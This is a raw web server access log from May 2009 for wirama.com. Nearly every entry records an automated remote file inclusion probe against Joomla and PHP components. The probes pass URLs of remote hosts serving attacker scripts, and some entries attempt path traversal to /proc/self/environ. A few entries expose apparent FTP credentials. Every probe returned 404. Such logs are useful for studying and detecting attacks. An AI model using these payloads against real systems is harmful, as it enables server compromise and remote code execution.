93.164.123.218 - - [01/May/2009:07:14:58 -0700] "GET /logs/access_090330.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.151.132.176 - - [01/May/2009:07:18:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.151.132.176 - - [01/May/2009:07:18:21 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.151.132.176 - - [01/May/2009:07:18:21 -0700] "GET /skin/zero_vote/error.php?dir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:07:23:37 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:07:23:37 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:07:23:40 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:07:27:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:07:27:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:07:27:32 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.177.82 - - [01/May/2009:07:27:45 -0700] "GET /logs/access_090401.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.mama-nsk.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.177.82 - - [01/May/2009:07:27:45 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.mama-nsk.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.177.82 - - [01/May/2009:07:27:45 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.mama-nsk.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.177.82 - - [01/May/2009:07:27:54 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.mama-nsk.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.177.82 - - [01/May/2009:07:27:54 -0700] "GET /logs/access_090401.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.mama-nsk.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.116.177.82 - - [01/May/2009:07:27:54 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.mama-nsk.ru/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [01/May/2009:07:28:01 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [01/May/2009:07:28:02 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [01/May/2009:07:28:02 -0700] "GET /index.php?DOCUMENT_ROOT=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
147.83.83.89 - - [01/May/2009:07:28:32 -0700] "GET /logs//index.php?option=com_simpleboard&func=view&catid=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "wirama.com"
147.83.83.89 - - [01/May/2009:07:28:32 -0700] "GET /index.php?option=com_simpleboard&func=view&catid=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "wirama.com"
147.83.83.89 - - [01/May/2009:07:28:32 -0700] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "wirama.com"
147.83.83.89 - - [01/May/2009:07:28:32 -0700] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "wirama.com"
147.83.83.89 - - [01/May/2009:07:28:32 -0700] "GET /logs//index.php?option=com_simpleboard&func=view&catid=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
147.83.83.89 - - [01/May/2009:07:28:32 -0700] "GET /index.php?option=com_simpleboard&func=view&catid=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
147.83.83.89 - - [01/May/2009:07:28:32 -0700] "GET /logs//index.php?option=com_simpleboard&func=view&catid=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
147.83.83.89 - - [01/May/2009:07:28:32 -0700] "GET /index.php?option=com_simpleboard&func=view&catid=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
84.54.137.9 - - [01/May/2009:07:28:44 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://garnet.at.ua/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
84.54.137.9 - - [01/May/2009:07:28:44 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://garnet.at.ua/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
84.54.137.9 - - [01/May/2009:07:28:44 -0700] "GET /logs/access_090301.log//admin/spaw/spaw_control.class.php?spaw_root=http://garnet.at.ua/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.79.12.9 - - [01/May/2009:07:29:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
77.79.12.9 - - [01/May/2009:07:29:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
77.79.12.9 - - [01/May/2009:07:29:42 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
60.249.11.3 - - [01/May/2009:07:32:08 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/plugins/docman/idr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
60.249.11.3 - - [01/May/2009:07:32:09 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/plugins/docman/idr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
77.79.12.9 - - [01/May/2009:07:33:40 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
77.79.12.9 - - [01/May/2009:07:33:40 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
77.79.12.9 - - [01/May/2009:07:33:41 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
93.164.123.218 - - [01/May/2009:07:38:22 -0700] "GET /logs/access_090331.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:07:38:22 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:07:38:27 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:07:42:02 -0700] "GET /logs/access_090330.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.222.15.109 - - [01/May/2009:08:09:37 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.aquafin.be/nl/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
83.222.15.109 - - [01/May/2009:08:09:37 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.aquafin.be/nl/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
83.222.15.109 - - [01/May/2009:08:09:37 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.aquafin.be/nl/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
85.18.117.101 - - [01/May/2009:08:20:33 -0700] "GET /login.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.18.117.101 - - [01/May/2009:08:20:33 -0700] "GET /logs/access_090331.log//login.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.18.117.101 - - [01/May/2009:08:20:33 -0700] "GET /logs//login.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.194.66.40 - - [01/May/2009:08:24:53 -0700] "GET /errors.php?error=http://www.wg.com.pl/downloads/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
82.194.66.40 - - [01/May/2009:08:24:53 -0700] "GET /logs/errors.php?error=http://www.wg.com.pl/downloads/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
75.125.167.2 - - [01/May/2009:08:37:31 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
75.125.167.2 - - [01/May/2009:08:37:31 -0700] "GET /skin/zero_vote/error.php?dir=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
75.125.167.2 - - [01/May/2009:08:37:35 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
89.248.102.157 - - [01/May/2009:08:53:07 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.search9.net/config/proxy/ec.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
89.248.102.157 - - [01/May/2009:08:53:08 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.search9.net/config/proxy/ec.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.wirama.com"
89.248.102.157 - - [01/May/2009:08:53:08 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://arclips.com/flash/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
89.248.102.157 - - [01/May/2009:08:53:08 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://arclips.com/flash/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.wirama.com"
85.18.117.101 - - [01/May/2009:08:53:32 -0700] "GET /login.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.18.117.101 - - [01/May/2009:08:53:32 -0700] "GET /logs//login.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.18.117.101 - - [01/May/2009:08:53:32 -0700] "GET /logs/access_090331.log//login.php?dir=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.254.231.239 - - [01/May/2009:08:58:43 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.254.231.239 - - [01/May/2009:08:58:43 -0700] "GET /logs/access_090331.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.254.231.239 - - [01/May/2009:08:58:43 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [01/May/2009:09:01:26 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:09:01:26 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:09:01:26 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:09:22:16 -0700] "GET /logs/access_090331.log%20%20//zero_vote/ask_password.php?dir=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:09:22:16 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:09:22:16 -0700] "GET /zero_vote/ask_password.php?dir=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:24:23 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:24:23 -0700] "GET /logs/access_090329.log%20%20//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:24:23 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:24:36 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:24:36 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:24:36 -0700] "GET /logs/access_090329.log%20%20//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:09:25:14 -0700] "GET /logs/access_090331.log%20%20//zero_vote/ask_password.php?dir=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:09:25:14 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:09:25:14 -0700] "GET /zero_vote/ask_password.php?dir=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:26:21 -0700] "GET /logs/access.log%20%20//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:26:40 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:26:40 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:26:40 -0700] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:26:41 -0700] "GET /logs/access.log%20%20//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
77.93.216.69 - - [01/May/2009:09:30:06 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:30:16 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:30:16 -0700] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.220.255.156 - - [01/May/2009:09:30:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.115.89.68 - - [01/May/2009:09:33:46 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.115.89.68 - - [01/May/2009:09:33:46 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.115.89.68 - - [01/May/2009:09:33:47 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:09:36:24 -0700] "GET /zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:36:24 -0700] "GET /logs/access_090401.log//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:36:24 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:36:28 -0700] "GET /logs/access_090331.log//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:36:36 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:36:36 -0700] "GET /logs/access_090401.log//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:36:36 -0700] "GET /zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:36:40 -0700] "GET /logs/access_090331.log//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:37:32 -0700] "GET /logs/access_090401.log//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:37:32 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:37:33 -0700] "GET /zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:09:37:37 -0700] "GET /logs/access_090331.log//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.115.89.68 - - [01/May/2009:09:37:45 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:09:38:45 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:09:38:45 -0700] "GET /logs/access_090331.log%20%20//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:09:38:46 -0700] "GET /zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:09:39:29 -0700] "GET /zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:09:39:29 -0700] "GET /logs/access_090331.log%20%20//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:09:39:29 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.58.186.213 - - [01/May/2009:09:40:32 -0700] "GET /logs/scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
207.58.186.213 - - [01/May/2009:09:40:32 -0700] "GET /scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
65.55.37.172 - - [01/May/2009:09:41:15 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.37.172 - - [01/May/2009:09:41:15 -0700] "GET /pr02.htm HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
62.140.23.192 - - [01/May/2009:09:41:23 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [01/May/2009:09:41:23 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.140.23.192 - - [01/May/2009:09:41:23 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://kdmeuimovel.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.58.186.213 - - [01/May/2009:09:42:36 -0700] "GET /scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
207.58.186.213 - - [01/May/2009:09:42:36 -0700] "GET /logs/scanftp://temuco:69336933@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
208.52.167.208 - - [01/May/2009:09:42:48 -0700] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://kiliclub.com/temp/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
208.52.167.208 - - [01/May/2009:09:42:48 -0700] "GET /bbs/skin/zero_vote/setup.php?dir=http://kiliclub.com/temp/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
208.52.167.208 - - [01/May/2009:09:42:48 -0700] "GET /logs/access_090331.log%20%20//bbs/skin/zero_vote/setup.php?dir=http://kiliclub.com/temp/sobi/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
